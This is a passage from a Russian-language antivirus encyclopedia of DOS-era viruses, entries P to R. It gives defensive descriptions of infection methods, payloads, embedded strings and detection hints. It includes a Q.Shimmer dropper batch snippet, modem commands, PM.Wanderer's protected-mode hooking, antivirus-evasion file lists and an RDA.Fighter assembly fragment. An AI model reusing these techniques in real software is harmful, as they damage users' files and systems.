А также может послать модему следующие команды управления "ATM2", "ATL3M0Q0X4S7=5DP9W", "ATS7=30DP8W1018094745268". Последняя команда - попытка позвонить в Калифорнию. Содержит тексты "AntiAidstest. ©Copyright Kovalevsky & company.", "AntiLozinsky.", "Лозинский-ЧМО", "COMMAND.COM ".

Phonix.927

Опасный резидентный вирус. При старте инфицированного файла вирус пытается заразить командный процессор (COMMAND.COM). Инсталлируется в память вирус только из командного процессора. Заражает COM и EXE-файлы при их закрытии (f.3Eh Int 21h). В пятницу 13 числа вирус уничтожает содержимое 14 цилиндров жесткого диска и выводит строку "PhФnix".

Phx.823, 965

Опасные резидентные вирусы. При записи в файлы (f.40h INT 21h) могут испортить последний байт данных. Содержат строку "PHX".

Pieck.2016

Неопасный файлово-загрузочный вирус. 3 марта выводит сообщение "Podaj haslo ?" и ждет ввода символов. Если ввести "pieck", то вирус выводит текст "Pozdrowienia dla wychowankow Pieck'a." и продолжает свою работу. Если же будет введено какое-либо другое слово, то вирус выводит сообщение "Blad !" и "вешает" систему.

Pindonga.3550, 3652

Опасные резидентные полиморфные вирусы. 16 сентября, 25 февраля, 21 марта и 27 августа вирусы уничтожают содержимое двух первых жестких дисков и выводят текст:
PINDONGA Virus V5.6. (Hecho en ARGENTINA)
Programado por Otto (16977)
Saludos a MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA-PABLIN
PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA)
PINDONGA Virus (Programado por OTTO en ARGENTINA) 16977.

Pixel.1268, 1271

После заражений файлов просит ввести пароль "ENTER THE PASSWORD: ". Если ввести фразу отличную от "Ken Sent Me", то вирус выведет текст "YOU HAVE ENTERED THE WRONG PASSWORD!!" и возвратит управление DOS. Содержит также текст "PreComFileRunSyndrome 1993".

Pixel.Flea.1577, 1647

Очень опасные вирусы. Уничтожают некоторые файлы, записывая в них код вируса Dir-II. Уничтожают содержимое текущего диска или случайных секторов диска.

Pixel.Hydra.340, 342, 343, 368, 372, 391, 403, 495

Опасные нерезидентные вирусы. Некоторые версии вирусов удаляют файл COMMAND.COM, или портят все EXE-файлы в текущем каталоге, или записывают в EXE-файлы код, который выводит текст "Who is John Galt?", или переназначают INT 4, INT 40h на INT 9 или на INT 13h, или выводят текст:
HYDRA
Copyright © 1991 by C.A.V.E.
Также содержат текст "HyDra-X Beta - Not For Release.", где X - порядковый номер версии вируса.

Pixel.Hydra.736

Неопасный нерезидентный вирус. Иногда выводит на экран сообщение:
HYDRA
Watch for the many heads.
The first eight are easy to find and kill.
Their replacements will be more sophisticated.
© 1991 - C. A. V. E.
Содержит тексты "HyDra Beta - Not For Release.", "Copyright © 1991 by C.A.V.E.", "Coalition of American Virus Engineers", "-=-=- Dedicated to supporting the anti-virus industry without recognition or reward. -=-=-".

Plague.2647

Неопасный резидентный стелс-вирус. При открытии инфицированных файлов (f.3Dh INT 21h) удаляет свой код из них. При закрытии (f.3Eh INT 21h) снова заражает. Внедряет команды межсегментного перехода на свой код в оригинальный обработчик INT 21h. При заражении файлов на флоппи-диски проверяет наличие защиты от записи на диск посредством чтения и обратной записи Boot-сектора данного диска. Содержит строку "PLAGUE".

PlayGame.2000

Неопасный файлово-загрузочный вирус. Заражает EXE-файлы при доступе к ним через INT 21h и MBR жесткого диска при первом старте инфицированной программы. Инсталляция в память TSR-копии вируса производится при загрузке системы с "винчестера". Содержит текстовые строки "[ MK / TridenT ]" и "CO4DSCCLVSNEHTTBVIF-FIGIIMRAFEMTBR". Не заражает программы, которые начинаются с двух букв, имеющихся в последней строке. Вирус предлагает поиграть в игру, смысл которой сводится к провождению "улыбающейся рожицы" код ASCII 02 между двигающимися препятствиями код ASCII 254. В процессе анализа вируса я даже поиграл в данную игрушку. Дошел аж до 2 уровня...

Ply.based (Ply.3360,3486,3759,3768,4224,4722,5133,5175)

Опасные нерезидентные пермутирующие (pemutating) вирусы. Данные вирусы не являются, ни шифрованными, ни полиморфными вирусами. Но алгоритм создания своих вирусных копий очень близок к полиморфным алгоритмам. Каждая ассемблерная команда вируса занимает не более 3 байт, эти 3 байта в свою очередь составляют некую вирусную компоненту. Если ассемблерная инструкция занимает менее 3 байт в компоненте, то вирус "разбавляет" ее NOP-командами. Причем в случайный момент времени эти NOP'ы могут изменять свое местоположение ("плавать") в компоненте. Вирусы состоят из 3 блоков: основной блок, блок данных и блок тождественных вызовов. Также в случайный момент времени вирусы могут переносить данные трехбайтовые компоненты из основного блока в блок тождественных вызовов и заменять их на JUMP или CALL в основном блоке. И наоборот из блока тождественных вызовов в основной блок в первоначальном виде. Таким образом, одинаковые инфицированные файлы могут не совпадать ни в одном байте основного вирусного блока. Различные модификации вируса могут не заражать следующие файлы: AVP,AVPLITE,AVPVE,BAIT,EICAR, EMM386, F-PROT, FV386, FV86, MSAV, MVTOOL10, SCAN, TBSCAN,TBAV,TBCHECK, TBCLEAN, TBDISK, TBDRIVER, TBFILE, TBGENSIG, TBKEY,TBLOG,TBMEM,TBSETUP, TBSCANX,TBUTIL,VALIDATE,VIRSTOP,VIRUS,VPIC,VSAFE. Ply.4722, 5133, 5175 удаляют файл \NCDTREE.

PM.Wanderer

Неопасный резидентный полиморфный вирус, использующий защищенный (виртуальный) режим процессоров i80386-Pentium. Для установки своей резидентной копии в память и переключения в защищенный режим процессора (Protected Mode) использует документированный интерфейс VCPI (Virtual Control Programm Interface) драйвера расширенной памяти EMS (EMM386). Вирус заражает COM и EXE-файлы при их запуске или открытии (f.4b00h, f.3dh Int 21h). При старте инфицированной программы, вирусный полиморфный декриптор расшифровывает основное тело вируса и передает ему управление. Далее основной вирусный код выделяет участок памяти в верхних адресах, копирует в него собственный код и передает ему управление. Затем он восстанавливает код инфицированного файла в программном сегменте (для EXE-файлов также производит настройку адресов перемещаемых элементов) и приступает к непосредственному внедрению в память своей резидентной копии. Первым делом вирус пытается выяснить установлен ли в системе драйвер EMS. Для этого он получает адрес прерывания INT 67h и проверяет наличие строки EM* в заголовке драйвера. Далее вирус проверяет не находится ли уже в памяти его резидентная копия - вызывает функцию AX=0BABAh INT 21h и проверяет ответ AX=0FA00h. Если драйвер EMS не установлен в системе или вирусная резидентная копия уже находится в памяти, а также в дальнейшем -при отсутствии интерфейса VCPI, вирус освобождает ранее выделенную память и отдает управление программе-вирусоносителю, заканчивая тем самым свою "жизнедеятельность" в системе. Если же "условия флоры" благоприятствуют, то вирус "перехватывает" INT 01 и трассирует INT 21h с целью нахождения определенной последовательности байт, присутствующих в оригинальном обработчике INT 21h MS - DOS версий 5.00 - 7.00. Если данная последовательность обнаружена, то вирус запоминает адрес ядра обработчика INT 21h, обычно расположенного в области HMA. В дальнейшем вирус будет использовать этот адрес для вызова INT 21h при заражении файлов. Дальнейшие действия вируса - проверка наличия в системе интерфейса VCPI и получение 4-ех адресов страниц памяти. Затем вирус получает адрес интерфейса VCPI, таблицу страниц и адрес глобальной дескрипторной таблицы GDT (Global Descriptor Table), состоящей из трех элементов (первый - дескриптор сегмента кода, два другие - используются драйвером VCPI). Вирус записывает в таблицу страниц ссылку на страницы, выделенные им драйвером VCPI, получает физический адрес страницы памяти сегмента, в котором вирус в данный момент находится. Потом получает регистры глобальной дескрипторной таблицы GDT и дескрипторной таблицы прерываний IDT (Interrupt Descriptor Table). Далее вирус создает три собственных дескриптора (кода и данных) и дескриптор сегментов состояния задачи TSS (Task State Segment) в глобальной дескрипторной таблице GDT, подготавливает значения для регистров CR3, GDTR,IDTR,LDTR, TR и адрес CS:EIP точки входа в защищенный режим и производит переключение процессора в защищенный режим работы с наивысшим уровнем привилегий - 0. В защищенном режиме вирус корректирует таблицу GDT, создавая в ней два собственных дескриптора сегментов и производит поиск дескриптора TSS. После чего вирус устанавливает две аппаратные контрольные точки по командам (Breakpoints) на первый байт кода обработчика INT 21h (адрес 0000:0084h) и на первый байт кода в BIOS по адресу 0FE00:005Bh (линейный адрес 0FE05Bh). Обычно в BIOS по адресу 0FE00:005Bh находится команда перехода (Near Jump) на процедуру перезапуска компьютера. Затем вирус корректирует дескрипторную таблицу прерываний таким образом, чтобы установить на прерывания: 1 (особый случай отладки) и 9 (клавиатура) собственные дескрипторы обработчиков данных прерываний. После этих приготовлений вирус копирует свой код в страницу памяти, полученную им еще до входа в защищенный режим и производит переключение процессора в виртуальный режим работы. Вирусный обработчик INT 09 производит контроль за наличием и (или) восстановлением своих двух контрольных аппаратных точек. А также, данный обработчик отслеживает нажатие на Ctrl-Alt-Del и в этом случае "сбрасывает" все аппаратные контрольные точки. Вирусный обработчик особого случая отладки проверяет произошло ли нарушение одной из двух "вирусных" контрольных точек по адресу команды.Если управление в данный обработчик попало из точки, находящейся "на процедуре" в BIOS - перезагрузки компьютера, то вирус сбрасывает все аппаратные контрольные точки, так же, как и обработчик INT 09 при нажатии на Ctrl-Alt-Del. Если же нарушение вызвано контрольной точкой оригинального обработчика INT 21h, то вирус анализирует значение регистра AX (или AH) с целью определения функции прерывания INT 21h и в зависимости от этого предпринимает различные действия. Если AX=0BABAh, то вирус считает, что данный вызов исходит от его "собрата",записывает в AX значение 0FACCh и возвращает управление оригинальному обработчику INT 21h. Если AX=3506h (получить адрес прерывания INT 06;обычно такой вызов существует во всех программах, написанных на языках высокого уровня: C, Pascal,...), то вирус пытается найти в пространстве линейных адресов 0-90000h некоторую последовательность байт, очевидно, принадлежащих программе ADinf (Дмитрию Мостовому - автору ADinf, не удалось найти такую версию ADinf от 10.00 до 11.01, в которой данная последовательность байт бы присутствовала). Если данная последовательность будет вирусом найдена, то он неким образом модифицирует найденный код, так, чтобы управление не попадало на вызов какой-то межсегментной процедуры. Если AX=4B00h (запуск программы) или AH=3dh и AL не равно ?Fh (открытие файла только на чтение), то вирус копирует свой код по адресу 9000:0000h (линейный адрес 90000h),переключает процессор в виртуальный режим работы и отдает управление своему коду, находящемуся в пределах первого мегабайта в сегменте 9000h. Вирус проверяет последние две буквы расширения имени файла и производит создание своей полиморфной копии и заражение файлов размером более 4K. Причем вирус внедряет свой код в начало COM или в середину (сразу же за заголовком) EXE-файлов, запоминая оригинальный программный код в конце файлов."Реальный рабочий код" вируса составляет 3684 байт, но на практике инфицированные файлы имеют приращение длины более 3940 байт.При возникновении любой ошибки в процессе заражения или при выходе из виртуального режима процессора вирус вызывает INT 21h с AX=4B00h для вызова особого случая исключения и возвращения управления оригинальному обработчику INT 21h. Вирус в своем теле содержит текст "WANDERER,© P. Demenuk". По этой строке, видимо,можно сделать выводы, что автором данного "шедевра" следует считать московского человека - Петра Деменюка. Через три года Петя создал все-таки свой новый "великолепный продукт, достойный восхищения...". Из всего вышесказанного следует, что обнаружить резидентную копию данного вируса, находящегося в нулевом кольце защищенного режима процессора обычными способами невозможно. Для обнаружения вируса в памяти необходимо переключаться в защищенный режим с наивысшими привилегиями и по таблицам GDT или IDT производить его поиск. Но попытаться обнаружить признаки вируса в системе можно и обычными способами. Для этого необходимо прочитать линейные адреса двух первых аппаратных контрольных точек (0 и 1) и сравнить их со значениями, которые описаны выше. На основании наличия определенных адресов и делается вывод о возможности нахождения вируса PM.Wanderer в памяти компьютера. Теперь немного о результатах тестирования. При заражении нескольких тысяч файлов-жертв вирус проявил себя, как "жилец" - все зараженные файлы оказались работоспособными. Здесь надо только сделать поправку - файлы могут оказаться неработоспособными в том случае, если их стек после заражения окажется в области вирусного кода. PM.Wanderer при заражении файлов не корректирует значения стартовых SS:SP. Как уже отмечалось выше, вирус сохраняет способность к воспроизводству,только в том случае, если в системе установлен драйвер EMS (EMM386). При установленном драйвере EMM386 с ключом NOEMS, вирус перезагружает компьютер. Компьютер также может перезагрузиться, если в системе используется драйвер QEMM386. Самое интересное в том,что если в системе находился резидентный вирус, а потом произошла загрузка Windows 3.1x или Windows'95, то вирус не сможет размножаться в данных операционных средах, но при выходе в DOS, вирус опять получает управление и может "трудиться не покладая рук". Если же вирус будет запущен в Windows DOS- окне, то из-за отсутствия интерфейса VCPI вирус не сможет переключиться в защищенный режим. Под OS/2 вирус - нежизнеспособен, также из-за отсутствия VCPI. В заключение стоит отметить, что это первый известный вирус (причем, российский), использующий защищенный (виртуальный) режим работы процессора и не конфликтующий с операционными системами "от Microsoft", работающими также в защищенном режиме.

PME - вирусы

PME (Phantasie Mutation Engine) - полиморфные генераторы вирусных шифровщиков и расшифровщиков. Создан китайским вирусописателем по кличке Burglar. Существуют две версии данного генератора. Они содержат тексты:
PME v1.00 © Jan 1995 By Burglar
PME v1.01 © Feb 1995 By Burglar

PME.Burglar

Опасный резидентный полиморфный вирус. Иногда вешает систему и выводит текст:
Hello! This is [Super Virus-2] ... written by Burglar in Taipei, Taiwan

Polimer.512

Неопасный нерезидентный вирус. При старте вирус выводит сообщение "A legjobb kazetta a POLIMER kazetta ! Vegye ezt !". Содержит строку "ERROR".

Polska.4004

Неопасный вирус. В 1994 году 7 и 23 числа каждого месяца до июля выводит в графическом режиме поднимающийся на флагштоке развивающийся бело-красный польский флаг, на котором написано "TERAZ POLSKA" и в левом вернем углу текст:
TERAZ POLSKA v2.0
produced by NoName
All rights reserved
© 93.12.22 POLAND

Poro.1257

Опасный резидентный вирус. С 15 по 25 сентября выводит на экран текст:
С Днем рождения, Аллочка !
Наилучшие пожелания твоему Hard Disk'у !
При записи на диск (f.03 Int 13h) вирус пытается найти словосочетания
"Bori", "BORI", "Бори" и "БОРИ" и заменить их соответственно на "Poro",
"PORO", "Поро" и "ПОРО". Содержит зашифрованный текст "Turbo Bugger ©
1994 Dedicated to Alla R. Borisyuk ( МЕХ-МАТЬ 307 )".

Poruchik.2774

Написан для процессора 386. Устанавливается резидентно в верхние адреса памяти. При смене директория (f.3Bh INT 21h) вирус производит поиск файлов *.exe и заражает их. Содержит текст: "Поручик Лозинский, раздайте Aidstestы".

Possessed.2175, 2367, 2438, 2443, 2446 (1,2)

Опасные резидентные вирусы. Иногда удаляют файлы. Рисуют на экране в графическом видеорежиме улыбающееся лицо. Выводят текст "POSSESSED! Bwa! ha! ha! ha! ha!". Также содержат строку "Author: JonJon Gumba of AdU".

Predator.1063,1072 (2),1137,1148,1154,1195

Опасные резидентные самошифрующиеся, кроме Predator.1063, вирусы. Перехватывают INT 21h и INT 13h. При чтении секторов через INT 13h вирусы могут испортить значение одного случайно выбранного бита в буфере считанных секторов. Содержат текстовые строки:
Predator.1072 (1): Predator virus © Mar. 93 Priest
Predator.1072 (2):
Predator Strain B © 1993 Priest - Phalcon/Skism
Predator.1063,1137,1148,1154,1195:
Predator virus © Mar. 93
In memory of all those who were killed...
Wookies ain't the only ones that drop! Priest

Predator.2448

Резидентный файлово-загрузочный полиморфный вирус. При старте инфицированного файла трассирует INT 13h и INT 21h, становится резидентно в верхних адресах памяти. Может "внедриться" в оригинальный обработчик INT 21h, произведя изменение его 5ти первых байт. Заражает MBR и Boot-сектора дискет, причем загрузочный сектор диска шифрует и "прячет": для жесткого диска в секторе 2, для дискет - в первом секторе последней дорожки. Содержит текстовую строку: Predator virus #2 © 1993 Priest - Phalcon/Skism

Pretentious.680

Неопасный нерезидентный вирус. Иногда выводит на экран текст:
Windows 95 may be dangerous.
OS/2 is the best operating system!
I`ll prove it soon...
Также содержит строку "* Gdynia 1996 * v1.0 *".

Priest.1416

Нерезидентный очень опасный вирус. Заражает COM и EXE-файлы в текущей директории. Если номер месяца совпадает со значением дня, то вирус считывает 9 первых секторов жесткого диска в память, уничтожает их на диске, а затем выводит текст:
Я великий вирус ЖРЕЦ !!! Только что я стер ваши BOOT,MBR и FAT.
Не расстраивайтесь ,эта жертва будет принесена только если
вы не отгадаете загадку (отвечайте латинскими буквами) :
Какой в КМУГЕ самый лучший факультет :
Если ответить, что fareo, то вирус восстановит первые сектора диска.
Также в 16 часов вирус может вывести сообщение:
"Hello i'm virus Crazy Priest !!!
Мне очень жаль,но в жертву был принесен файл " - дальше идет имя файла.
В данный файл вирус будет записывать случайную информацию, до тех пор,
пока не будет нажата клавиша "Space" - "Пробел". 15 августа выводит
текст: "HAPPY BIRTHDAY CRAZY !!!".

Printerceptor

Опасный резидентный стелс-вирус-спутник. Перехватывает INT 21h. Блокирует вывод на принтер. Содержит строку "Printerceptor".

Privet.1152

Неопасный резидентный вирус. При старте может вывести текст "привет всем". также содержит тексты "*.exe skh", "плохо дело".

Problem.734, 845, 854, 856, 857, 863

Неопасные резидентные вирусы. Problem.854, 856, 863 содержат текст "THIS IS YOUR PROBLEM !", Problem.857 - "by Mojo Risin for 1605", Problem.845 - "dATA kILLER !".

Procuror

Очень опасный Boot-вирус. Имеет различные загрузчики для жестких и гибких дисков. При загрузке с гибкого диска может отформатировать начальную дорожку первого жесткого диска. Оригинальный MBR шифрует и прячет в 7 секторе первой дорожки. Для гибких дисков оригинальный Boot-сектор и 2 сектора своего продолжения записывает в последние 3 сектора последней дорожки. При загрузке с флоппи-диска прехватывает INT 1Eh и INT 13h. При загрузке с "винчестера" перехватывает INT 08h (таймер), INT 13h, INT 17h (вывод на принтер). При выводе на принтер цифр 0-4, вместо них выводит значения увеличенные на 1, вместо цифры 5 выводит 0. Примерно через 30 минут работы после загрузки в буфер клавиатуры помещает слово "PROCUROR". Может изменить значение часов реального времени в CMOS-памяти.

Prohibit.1500

Неопасный резидентный шифрованный стелс-вирус. При открытии файла вирус удаляет свой код из файла, при его закрытии снова заражает его. Иногда выводит текст "Will see you next time . Stone 93". Также содержит текст "Prohibit MARYJUANA".

Promiscuo.2725

Опасный резидентный полиморфный вирус. Уничтожает файлы ANTI-VIR.DAT, CHKLIST .MS,,"©1996 por pRoMisCuO sExUaL!!".

Prowler.1543

Неопасный резидентный файлово-загрузочный шифрованный вирус. 13 числа при загрузке системы с инфицированного жесткого диска вирус выводит в графическом режиме шагающего из правого нижнего угла в левый нижний угол экрана маленького человечка и выводит текст:
I am Еhe MidnighЕ Pr0wler, s0n 0f Еhe m00n
And I am the child 0f Еhe generaЕi0n....

Prowler.2379

Очень опасный резидентный полиморфный вирус. При открытии файлов конфигурации некоторых почтовых программ (SF-MAIL.CFG и T-MAIL.CTL), вирус дописывает в их конец строки паролей:
[Miscellaneous]
DoorWay_Password 'GLORY'
или
T-Password GLORY
Причем данные записи будут находиться за 80 столбцом экрана, т.е., при просмотре содержимого данных файлов в обычном тестовом редакторе эти записи будут не видны.

0

17

Q

Q.8Ball (1,2)

Неопасные резидентные вирусы.Заражают загрузочные сектора дискет и файл C:\CONFIG.SYS. При загрузке системы с инфицированного флоппи-диска вирусы копируют себя в область видеопамяти B800:7C00, "перехватывают" INT 1Ah (BIOS time and date), "ждут" вызова данного прерывания, после чего "перехватывают" INT 21h и "освобождают" INT 1Ah. После вызова любой функции INT 21h (кроме запуска программ - AH=4Bh) вирусы создают файл со случайным именем (f.5Ah Int 21h) на диске C:, записывает в него свой код и внедряют в конец файла c:\config.sys строку вызова данного файла, типа INSTALL=C:\ABCD.FGH (Q.8ball (1)) или DEVICE=C:\IJKL.MNO (Q.8ball (2)). После этого или после функции EXEC (f.4Bh Int21h) вирусы восстанавливают оригинальный адрес обработчика INT 21h. При запуске файла, указанного в файле CONFIG.SYS, вирусы копируют себя в область памяти HMA и "перехватывают" INT 40h для заражения загрузочных секторов дискет. Q.8ball (1) содержит текст "8_Ball -=Q=-".

Q.IOwe

Неопасный вирус. Заражает файл IO.SYS, если он содержит в начале последовательность 261 повторяющихся нулевых байт. Вирус записывает свой код в область нулей и устанавливает на себя первую инструкцию файла IO.SYS (короткий JUMP - EB 05). При старте такого инфицированного файла, вирус копирует свое тело в область видеопамяти BE00:0000, "перехватывает" INT 1Ah (BIOS time and date), "ждет" вызова данного прерывания, после чего "перехватывает" INT 21h и "освобождает" INT 1Ah. После вызова любой функции INT 21h (кроме запуска программ - AH=4Bh) вирус пытается заразить файл C:\IO.SYS указанным выше способом. После заражения данного файла или после функции EXEC (f.4Bh Int21h) вирус восстанавливает оригинальный адрес обработчика INT 21h. Содержит тексты "I OWE" и "-=Q=-".

Q.Shimmer (1,2)

Неопасные вирусы. Заражают файл C:\WINDOWS\WINSTART.BAT и загрузочные сектора дискет. При загрузке системы с инфицированного флоппи-диска вирус копирует себя в область видеопамяти B800:7C00, "перехватывает" INT 1Ah (BIOS time and date), "ждет" вызова данного прерывания, после чего "перехватывает" INT 21h и "освобождает" INT 1Ah. После вызова любой функции INT 21h (кроме запуска программ - AH=4Bh) вирус создает файл WINSTART.BAT в каталоге C:\WINDOWS, если таковой существует и не содержит данного файла. В файл WINSTART.BAT вирус записывает свой код, содержащий текстовые строки:
@ECHO PKX>INSTALL.EXE
@COPY/B INSTALL.EXE+%0.BAT>NUL
@INSTALL.EXE
После которых идет основное вирусное тело, состоящее из ассемблерных инструкций. При запуске такого файла, происходящего, как правило, при старте MS-Windows, вирус создает файл INSTALL.EXE из 5 текстовых байт и собственного кода из файла WINSTART.BAT. Данный файл INSTALL.EXE запускается вирусом. Первые 5 текстовых байт файла INSTALL.EXE понимаются процессором, как ассемблерные команды: PUSH AX, DEC BX, POP AX, OR AX, ??0A, после которых управление попадает в основной код вируса. Вирус проверяет установлена ли его резидентная копия в памяти, копирует себя в область HMA и "перехватывает" INT 2Fh. При получении управления через INT 2Fh, вирус "перехватывает" INT 40h для заражения загрузочных секторов флоппи-дисков. Q.Shimmer (2) пытается послать в любой доступный из 4 последовательных портов последовательность модемных команд "~ATM0L0S0=1O1". Q.Shimmer (1) содержит текст "New Shimmer".

Qawo.719

Неопасный резидентный вирус. Вроде бы, содержит зашифрованную строку "Qawo".

Qmu.1513

Опасный файлово-загрузочный вирус. Заражает MBR жесткого диска и COM- файлы. При старте инфицированного COM-файла вирус устанавливает в память свою резидентную копию и выводит сообщение "Bad command or file name". При 100-й загрузке с инфицированного жесткого диска уничтожает 16 его первых секторов. При каждом 256-м чтении с диска (f.2 Int 13h) подставляет в считанный блок по адресу 0C8h слово "mj".

Qudem.555

Неопасный резидентный вирус. Содержит тексты "Quick Demon 2", "Dr.WEB меня не находит-обманули !".

Query

Опасный загрузочный вирус. В декабре уничтожает информацию на жестком диске.

Quox

Опасный загрузочный вирус. При заражении MBR может записать оригинальный MBR в сектор, содержащий данные.

0

18

R

Radio101.1000

Неопасный шифрованный вирус. Примерно, через 53 минуты после старта вирус выводит текст "Paдио 101". Содержит текстовую строку "Без паники-идем ко дну!Ver 2.01".

Radio 101.2076

Неопасный полиморфный резидентный вирус.Примерно, через 5 минут после старта вирус выводит текст "Радио 101-наслаждение даже при половине громкости!".

Raiden.1433

Неопасный файлово-загрузочный вирус. Заражает MBR жесткого диска и EXE- файлы. При старте инфицированной программы с некой командной строкой (вирус считает CRC данной строки), вирус может произвести самолечение данной программы.

Rain

Опасный загрузочный вирус. В 19:15 уничтожает 2 сектора на головке-1, цилиндре-0 и с сектора-1, где, как правило, находится загрузочный сектор активного раздела, записывая туда вирусный код. Содержит текст
This is only a demo version made for Germany. New versions coming soon.
Written in the rain..

Rake.975

Неопасный резидентный вирус. Пытается не заражать файлы, содержащие в своем теле строки "ИРУС", "IRUS", "виру" или "viru". Может перемещать свою резидентную копию по различным адресам памяти.

RaseK.1489, RaseK.1490, RaseK.1492

Очень опасные файлово-загрузочные вирусы. Заражают COM, EXE-файлы и MBR жесткого диска. Также внедряют деструктивный код в Boot-сектора дискет, не сохраняя оригинальный сектор. При загрузке с такого флоппи-диска вся информация на первом жестком диске будет уничтожена. Вирусы также могут уничтожить информацию на "винчестере" при загрузке с жесткого диска. Вирусы перехватывают INT 13h и INT 21h. Используют стелс-механизм при попытке чтения MBR, скрывают приращение длины зараженных файлов. Не заражают файлы, содержащие строку AND.COM (COMMAND.COM). В теле вирусов присутствуют строки:
RaseK.1489 - "RaseK v2.1,from LA CORUеA(SPAIN).Mar93";
RaseK.1490 - "RaseK v2.0,from LA CORUеA(SPAIN).Mar93";
RaseK.1492 - "RаseKо v3.1,from La Coruдa(SPAIN).Ap93".

Raving.2300

Опасный нерезидентный вирус, создающий новые COM-файлы вместо найденных. Выводит приглашение "C:\>", после чего ждет нажатий на клавиши и выводит случайные символы вместо введенных. После этого выводит текст:
I DON'T THINK YOU WOULD LIKE TO SMILE, BECAUSE I HAVE INFECTED A FILE!!!
HAVE YOU HEARD OF A RAVING VIRUS MC, YES YOU GUESSED IT THAT IS ME!!!
YOU WONT SEE ANOTHER RHYME UNTIL IT IS INFECTING TIME!!!

RDA.Fighter.5871, 5969, 7408, 7802, 7868

RDA.Fighter.5871, 5969, 7802, 7868 -это резидентные сложнополиморфные вирусы, заражающие файлы в формате COM и EXE. RDA.Fighter.7408 - файлово-загрузочный полиморфный вирус (заражает COM, EXE-файлы и MBR жесткого диска), скрывающий приращение свой длины в инфицированных файлах. RDA.Fighter.7802 помимо полиморфных расшифровщиков имеет также полиморфный механизм случайной расшифровки собственного кода. При неаккуратной трассировке RDA.Fighter.5969, 7408 могут уничтожить случайные сектора на жестком диске. Получив управление, основной расшифрованный код вирусов получает из часов реального времени случайное 32 разрядное значение, используемое вирусами для расшифровки еще одного своего участка кода. После всевозможных умножений, делений, сложений, вычитаний из 32хразрядного случайного числа получается базовое 16 разрядное случайное число в регистре AX. Это число умножается на 2 в регистре DI. Этот регистр DI будет указывать точку входа в таблицы комбинаций вирусных расшифровывающих команд. Существует 2 таблицы по 16 комбинаций расшифровывающих команд, некоторые из которых повторяются. Эти таблицы представлены ниже. Назовем эти таблицы: "первая" и "зеркальная". Далее, на основе установленных бит 16 разрядного числа в регистре AX, выбирается расшифровывающая команда из первой таблицы, в зависимости от регистра DI. Например, если нулевой бит установлен в 1, то берется команда из таблицы (команду в таблице выбирает регистр DI), которая копируется в тело расшифровщика с помощью антиотладочных команд манипуляции стеком. В тело расшифровщика также заносится некоторая первоначальная константа, с помощью которой могут производиться операции расшифрования, и которая в цикле расшифровки будет динамически изменяться по определенному закону. Данный закон направлен против отладчиков. По окончании цикла данной расшифровки значение регистра DI устанавливается на следующую команду в первой таблице. Потом данная операция производится для всех установленных битов в 16 разрядном значении AX. Если какой-либо бит не установлен, то цикл не проводится, а значение DI передвигается на следующую команду. Если указатель DI выходит за рамки последней 16 команды в таблице, то его значение устанавливается на первую команду таблицы. Как только все биты в AX исчерпаны, вирусы приступают к проверке того, что они всеми этими хитроумными комбинациями расшифровали. Делают они это также хитроумным способом. Они подсчитывают контрольную сумму расшифрованного участка кода в зависимости от участка кода, который не был зашифрован. Подсчет CRC производится "веером", от границы расшифровки и вверх, и вниз подсчитывается 48 разрядное значение. При подсчете CRC используются всевозможные команды пересылки, ADD, XOR,... Причем, вирусы RDA.Fighter.5969, 7408 использует еще и дополнительную динамическую корректировку CRC с помощью INT 01. А вирус RDA.Fighter.7408 дополнительно имеет 4 различных варианта подсчета CRC, меняющихся от копии к копии. Полученное значение CRC хранится в регистрах AX, BP и DX. Регистр BP складывается с числом, хранящимся в теле вируса, корректируется относительно нахождения базовой точки вируса в памяти и значение по смещению BP сравнивается с полученным значением DX. Причем, в случае правильной расшифровки смещение хранения CRC должно находиться в ранее зашифрованной области вируса. Если полученное значение CRC не совпадает со значением DX, то вирусы повторяют описанную выше комбинацию, только в качестве таблицы расшифровывающих команд теперь будет использоваться зеркальная таблица. А делается это для того, чтобы возвратить в исходное состояние ранее расшифрованную по "неправильному" закону область вирусного кода. После того, как вирус возвратит все в исходное состояние, попытка "правильной" расшифровки повторяется сначала, начиная с получения случайного числа в регистре AX, и использования в качестве базовой - первой таблицы расшифровывающих команд. Вирусы будут "прокручивать" весь цикл с 16 разрядами регистра AX, потом тот же вариант повторять с зеркальной таблицей и т.д., до тех пор, пока, наконец, они не удостоверятся, что все расшифровалось правильно. Но, так как, вирусы постоянно "следят" за отладчиком, следует помнить, что в разрывах между попытками расшифровки вирусного кода можно угодить в "опасный" код, уничтожающий информацию в секторах жесткого диска, описанный выше. RDA.Fighter.7802, 7868 "разбавляют" инструкции кода случайной расшифровки командами-"мусором" (такие команды, которые не влияют на результат расшифровки). А также "первая", и соответствующая ей "зеркальная" таблица, будут отличаться для каждого экземпляра вирусов RDA.Fighter.7802, 7868. Резидентные части вирусов контролируют функции запуска программ ( AX=4B00h) и открытия файлов (AH=3Dh). RDA.Fighter.5969 также контролирует функцию переименования файлов (AH=56h). При вызове данных функций вирусы пытаются заразить файлы, длина которых не меньше, чем 4096 байт. RDA.Fighter.7408, 7802, 7868 дополнительно контролируют функции поиска файлов (AH=11h,12h,4Eh,4Fh) и скрывают приращение своей длины у инфицированных файлов. В конце каждого зараженного файла RDA.Fighter.7408, 7802, 7868 хранят 2 байта размера вирусного кода, внедренного в данный файл. RDA.Fighter.7408, 7802, 7868 "перехватывают" также INT 08 и несколько замедляют работу компьютера. Резидентная активная копия вируса RDA.Fighter.7408 при вызове функции AX=0EEEEh удаляет свой код из MBR жесткого диска. RDA.Fighter.7408, 7802, 7868 при вызове данной функции также и обезвреживает себя в памяти. Резидентные копии вирусов используют очень мощный помехозащищенный алгоритм восстановления собственного кода, позволяющий не допустить отладку кодов вирусов с использованием отладочных точек останова. Мало того, вирусы "ради шутки" пытаются ввести в заблуждение, внедряя сразу в свои обработчики INT 21h инструкцию выхода из прерывания- IRET! Но оригинальные байты обработчика вирусы сами же и исправляют с помощью помехозащищенного алгоритма восстановления. Начальный код вирусных обработчиков INT 21h выглядит следующим образом (ниже представлен обработчик INT 21h вируса RDA.Fighter.5969):
PUSH AX
INC AH
CMP AX,4C00 ;запуск программы?
JE CHECK_FILES
CMP AH, 3E ;открытие файла?
JE CHECK_FILES
CMP AH, 57 ;переименование файла?
JE CHECK_FILES
DESTROY_HANDLER:
POP AX
JMP DWORD PTR CS:[ADR_INT21] ;выход в оригинальный INT 21h
CHECK_FILES:
CALL CHECK&RESTORE ;проверка и восстановление
MOV CS:DESTROY_HANDLER, 90CF ;вместо POP AX установить IRET?!
